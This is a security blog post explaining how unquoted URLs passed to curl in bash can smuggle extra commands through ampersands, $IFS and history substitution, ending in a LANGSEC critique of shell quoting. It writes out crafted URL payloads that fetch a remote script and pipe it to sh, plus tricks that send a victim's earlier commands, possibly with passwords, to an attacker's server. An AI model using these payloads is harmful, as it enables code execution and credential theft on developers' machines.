Curl, unquoted URLs, and LANGSEC

The other day I had an unpleasant realization about curl, and how I use it. I'm going to guess most programmers have had this experience:

tim@puter:~$ curl -sS
[1] 638
bash: baz: command not found
tim@puter:~$ <!doctype html>
    <title>Example Domain</title>

...and immediately have the reaction "oh dammit I forgot to quote the URL", because that innocuous little ampersand is getting interpreted in bash as "run the preceding as a command in the background".

This has happened to me from time to time for years, but it was only this week that I realized how *dangerous* it is.


(Skip this section if you're experienced in bash.)

Just quickly, I'll explain what's happening there, for anyone who's rusty on bash syntax. The & (ampersand) says "run the preceding command in the background". A little less well-known is that it works like ; (semicolon) to separate two commands, so you can use it as a line separator. Here's an example of running two commands on the same line using a semicolon to separate them:

tim@puter:~$ echo one; echo two

What if I wanted to run the first echo in the background for some reason? I know I can stick an ampersand on the end of a command to start the process in the background, so I'll try that:

tim@puter:~$ echo one &; echo two
bash: syntax error near unexpected token `;'

Well! Bash doesn't like that any more than if I'd run echo one ;; echo two. It doesn't like the "empty command". Ampersand is like semicolon, except it signals bash to run the command in the background. (Note: I don't pretend to understand why echo one;—ending a line with a semicolon—does not produce the same error.) So let's take another look at that first curl command, and break it apart at the command separators:

curl -sS &

That's "fetch this (shorter) URL in the background and also run baz". Not what we meant at all. The answer is to put double or single quotes around the URL to stop bash from interpreting ampersands as command separators. (And this isn't specific to curl at all; pretty much any shell command is subject to this. I just happen to use curl a lot.)

So what?

It's easy to think of this as an annoyance, but what if instead of baz the last param were delete_all_files? Well... that would suck, but there is no such command. In fact, I can't think of any commands you can run with no arguments as a standard user that have a truly deleterious effect.

Are there any nasty things we can do to someone if we coerce them into curl'ing a provided URL unquoted? Ground rules: Assume the victim is a software developer who has encountered a suspicious-looking URL on the web. They copy the link and use curl to fetch it, but fail to quote the URL. They're using bash. (But we can autodetect their OS since it's the web, and I'm sure Powershell is just as susceptible to these tricks.)

Let's get dirty

The first step is getting arguments. If we want to run a proof of concept (let's say touch poc) we need some way of producing whitespace. (Why? Check it out: This link has a space in it in the source code, but if you copy the link, that space is encoded as a %20, and so are any quote marks and braces. So literal space chars are out.) The classic here is $IFS, which is a pre-set shell variable that contains a space, a tab, and a newline. It featured recently in a similar takeover exploit for home routers. We'll also need to refer to the target file as ./poc so that bash doesn't think we're referring to a variable called IFSpoc:

tim@puter:~$ curl -sS$IFS./poc
[1] 1328
tim@puter:~$ <!doctype html>
[1]+  Done                    curl -sS
tim@puter:~$ ls poc

Fetching an unquoted URL can reach out and touch your filesystem. I suspect this is game over any way you slice it, but let's keep going. Can we download and run a script immediately? One problem we run into immediately is that we need to terminate the $IFS variable reference on something that doesn't look like a variable, i.e., not "https". One approach is to call echo inside a command substitution to provide a short and effective separator between IFS and the URL: curl -sS$IFS$(echo)|bash? (Or as a link.) That fetches a script from my site and pipes it to bash. The script runs a cheeky little animation and then touches /tmp/KHXZNCt2587qvt5-dont-curl-unquoted as a harmless proof of exploit.


Frankly, that URL is pretty transparently a trick by now. Can we disguise it better?

The curl command allows non-absolute URIs, so we can start the URI with an at-sign (auth section separator, as in instead of a scheme, like so: curl Unfortunately, this defaults to plain http, but an attacker probably doesn't care about that. We can also use a shorter payload URL. I've set up to redirect to my payload, and curl supports the -L/--location option to follow redirects (also -s to suppress progress bar). Throw some other gibberish in the URL to make the eye gloss over the shell chars, use sh instead of bash, and we've got something maybe workable:$JH&curl$IFS-sL$IFS@tIMmC.oRG/x|sh&xj!55y!n9x [link]

...well, maybe that's too high-entropy, and devs would reflexively quote it who would not quote a simpler URL. I'm not sure it's a credible threat.

For bonus points, figure out how to produce a plausible stdout, and suppress notifications about background processes terminating.

A few other tricks

Other things that can happen with unquoted URLs:

  • Each query param in a URL has the same syntax as a shell variable assignment; curl'ing has the effect of setting $baz to 3 in the shell. (The other "params" execute in background shell sessions, and the variables do not end up in the main session.) If you found the right shell variable to clobber ($PATH?) I'm sure you could play havoc with someone's environment.
  • curl accepts globbing parameters; placing {1..100}somewhere in the URL would lead to 100 requests for that URL, each with a different number in places of that string. (OK, this one is specific to curl.)
  • History substitution works, since the exclamation point ! does not get encoded. You can call up and run the last command someone ran including a string. If you ended a malicious URL with &!curl the output of your command would be the output of their last curl command, if the referenced server is still in the same state. This might be a way of camouflaging an attack by confusing the victim.
  • ETA: Bonus trick -- history substitution can also allow exfiltration of commands, even with double quotes. curl -sS "!?@?" expands to include the dev's last command that included a "@" and sends it to your server in the URL query. This character might bring up SSH commands that sloppily include a password, or perhaps similarly a curl command with a --user argument. (How about curl -sS "!?--user?"...) If that history item includes a subshell e.g. echo "it's $(date)" then that subshell is re-executed and the output sent to you.


So, this all kind of sucks, right? We've had people gleefully reminding us not to paste text from the web into the terminal for the past decade (because it might contain hidden malicious commands rendered invisible with CSS) but we still do it, because it's a serious workflow interruption not to. And it turns out that even when you know what you're pasting, you might not know what you're pasting; if someone disguises one language as another, it can be terrifically difficult to get your brain to switch tracks when reading it. Quoting everything works, except when it doesn't (try echo "!e"), and then you need to single-quote, but single-quotes suck because you can't escape chars inside single-quoted strings, and telling people to do something every single time is a loser's game anyhow and...

What it comes down to is that shell language has a terrible interface from a security perspective. You wouldn't write this code, right? query("SELECT * FROM users WHERE userid = " + request.params["id"]) You'd use parameterized SQL instead. You wouldn't drop user data directly into HTML, right? You'd use an encode-by-default, context-aware HTML templating library instead, so that XSS holes can't happen. (Hahahahahahahaha right, no, the industry hasn't learned this one yet.) What these have in common is that naïve string concatenation allows an attacker to control the syntax of your code. It's a level violation -- data and code should be handled differently, and data should never be interpreted automatically as code.

But then why in the name of Cthulhu would you use a programming environment that encourages you to paste random data into an environment that has instant access to all your files and software? An environment with a string-concatenation-based language with arcane and irritating quoting rules?

I'll leave you to ponder this.

No comments yet. Commenting is not yet reimplemented after the Wordpress migration, sorry! For now, you can email me and I can manually add comments. Feed icon